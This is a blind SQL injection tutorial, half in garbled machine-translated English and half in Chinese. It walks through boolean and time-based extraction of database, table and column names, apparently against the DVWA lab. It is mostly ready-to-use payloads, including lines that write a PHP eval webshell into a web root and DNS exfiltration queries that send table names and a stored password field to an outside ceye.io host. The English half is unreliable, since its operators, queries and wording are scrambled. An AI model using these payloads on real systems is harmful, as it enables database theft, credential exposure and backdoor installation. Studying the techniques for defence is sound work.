SQL Injection (Blind), that is blind SQL injection, and the general difference is that the injection of general injection attacks can see the results directly from the injection statement on the page, but when the blinds an attacker can not generally be available on the display page the results, even if the injected statement is executed are not know, and therefore more difficult than the average blind inject high. Most of the current existing SQL injection vulnerabilities on the network is blind SQL injection.
0x01 classification
Booleanbase (based on Boolean)
Boolean Obviously Ture with Fales, which means it only returns Ture inject according to your information with Fales, there will be no error message before.
TimeBase (time-based)
interface returns only one value, true regardless of the input value returns any case will be handled according to the normal. Adding a specific function of time, the time difference by looking at the web page to return to judge the injected statement is correct
0x02 commonly used functions
1
2
3
4
5
6
7
|
substr () substr (String String, Start NUM, NUM length);
String to string; start is the initial position; length is the length.
count () function counts count () function is a function for recording the statistics, the number of rows returned matching condition
SELECT COUNT (*) from the mysql.user. 1 WHERE ID =
ASCII () Returns the decimal value corresponding to the character
length ( ) returns the length of the string
left () left (str, length ), namely: left (the string is intercepted, the interception of length)
|
The step of manual blinds 0x03
1 determines whether there is the injection, the injection is a character or a numeric
2. guess of the current database name
3. The guess database table name
field name guess table 4.
The data guess
0x04 Boolean blinds
1. Analyzing the injection point
1
2
3
4
|
. 1 '. 1 or # =. 1
. 1'. 1 or # 2 =
if the injection point after the order by, then it may be used to construct decision statement given.
select 1 from te order by if ( 1,1, (select 1 union select 2)) limit 0,3;
|
2. Database guess
1
2
3
4
5
6
7
8
9
10
11
12
13
|
Database length: 1 'and length (database ( )) = 4 #
database name:
dichotomy guess table: By comparing the ascii code, a character derived a
1' and ascii (substr (database (), 1 , 1))> # 97 page exists returns
1 '1 and
1' and ASCII (substr (Database (), 1,1))> # 100 returns the page does not exist
1 'and ascii (substr (database (), 1, 1)) <page # 103 returns the presence of
1 'and ascii (substr (database (), 1,1)) <100 # returned page does not exist
finally found that: the first character of the name database ascii code value of 100 get the letter d
repeating the above steps can guess the complete database of names dvwa
|
3. guess the table name
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
1 'and (select count (table_name ) from information_schema.tables where table_schema = database ()) = 1 # showed the absence of
1' and (select count (table_name ) from information_schema.tables where table_schema = database ()) = 2 # Display exists
that there are two tables, continue to use the length () function to guess the length of the table:
. 1 'and length (substr ((SELECT from table_name WHERE information_schema.tables TABLE_SCHEMA = Database () limit 0,1),. 1)) = # 1 showed the absence of
the User
of guestbook
1 'and length (substr ((SELECT from table_name WHERE information_schema.tables TABLE_SCHEMA = Database () limit 0,1), 1)) = 2 # showed the absence
?????
1' and length (substr ((select table_name from information_schema.tables where table_schema = database () limit 0,1), 1)) = 9 # shows the presence
described first table name length is 9.
1 'and ascii (substr (( select table_name from information_schema.tables where table_schema = database () limit 0,1) ,, 1)) = 97 # shows the presence of
the User
the U-
99
. 1' and ASCII (substr ((SELECT INFORMATION_SCHEMA from table_name .tables where table_schema = database () limit 0,1), 1,1)) <122 # showed the presence of
1 'and ascii (substr (( select table_name from information_schema.tables where table_schema = database () limit 0,1), 1,1)) <# 109 showed the presence of
1 'and ascii (substr (( select table_name from information_schema.tables where table_schema = database () limit 0,1), 1,1)) <103 # showed the absence of
1' and ascii (substr ((select table_name from information_schema.tables where table_schema = database () limit 0,1), 1,1))> 103 # showed the absence of
description in the name of a table for the first character lowercase g .
...
repeating the above steps, to guess the two table names guestbook, users.
|
4.猜解表中的字段名
首先猜解表中字段的数量:
1
2
3
4
5
6
7
8
9
10
11
12
|
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 显示不存在
…
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 显示存在
说明users表有 8 个字段。
接着挨个猜解字段名长度:
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # 显示不存在
…
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # 显示存在
说明users表的第一个字段为 7 个字符长度。
采用二分法,即可猜解出所有字段名。
|
5.猜解数据
0x05时间盲注
1.判断是否存在注入,注入是字符型还是数字型
1
2
|
1' and sleep(5) #感觉到明显延迟;
1 and sleep(5) #没有延迟;
|
2.猜解当前数据库名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
首先猜解数据名的长度
1' and if(length(database())=1,sleep(5),1) # 没有延迟
1' and if(length(database())=2,sleep(5),1) # 没有延迟
1' and if(length(database())=3,sleep(5),1) # 没有延迟
1' and if(length(database())=4,sleep(5),1) # 明显延迟
If函数 IF(expr1,expr2,expr3),如果expr1的值为true,则返回expr2的值,如果expr1的值为false,则返回expr3的值。
说明数据库名长度为 4 个字符。
接着采用二分法猜解数据库名:
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟
…
1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟
1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟
说明数据库名的第一个字符为小写字母d。
…
重复上述步骤,即可猜解出数据库名
|
3.猜解数据库中的表名
1
2
3
4
5
6
7
8
9
10
11
12
13
|
首先猜解数据库中表的数量:
1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟
1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟
说明数据库中有两个表。
接着挨个猜解表名:
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 没有延迟
…
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟
说明第一个表名的长度为 9 个字符。
采用二分法即可猜解出表名。
|
4.猜解表中的字段名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
首先猜解表中字段的数量:
1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 没有延迟
…
1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟
说明users表中有 8 个字段。
接着挨个猜解字段名:
1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟
…
1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟
说明users表的第一个字段长度为 7 个字符。
采用二分法即可猜解出各个字段名。
|
5.猜解数据
0x06导出Webshell
1
2
|
知道物理路径,且有MYSQL的ROOT权限
1' union select "<?php @eval($_GET['xxx']) ?>",2 into outfile 'C:\\phpStudy\\WWW\\123.php'#
|
0x07DNS注入(盲注的眼睛)
不论是bool型盲注还是时间型盲注,都需要频繁的跑请求才能够获取数据库中的值,在现代WAF的防护下,很可能导致IP被ban。我们可以结合DNSLOG完美快速的将数据取出。如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不仅能够加载本地文件,同时也能对诸如\www.test.com这样的URL发起请求。
函数
load_file函数:加载一个文件
原理
示例
Mysql
1
2
3
4
5
|
1.
test' and if((select load_file(concat('\\\\',(select database()),'.fz0bj5.ceye.io\\abc'))),1,1)#
test' and if((select load_file(concat('\\\\',(select user()),'.fz0bj5.ceye.io\\abc'))),1,1)#
然后查看ceye,成功获取到了数据库名称
对于表段,由于load_file()一次只能传输一条数据,所以查询的时候需要使用limit来一个一个的解析。
|
1
2
3
4
5
6
7
8
|
2.查表名
test' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='mkcms' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
3.查字段
test' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='mkcms_user' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
4.查字段值
test' and if((select load_file(concat('\\\\',(select u_password from mkcms_user limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
5.导出webshell(知道物理路径且Mysql为root权限)
test' union select "<?php @eval($_POST['wade']); ?>" into outfile 'C:\\phpstudy\\www\\wade.php'# |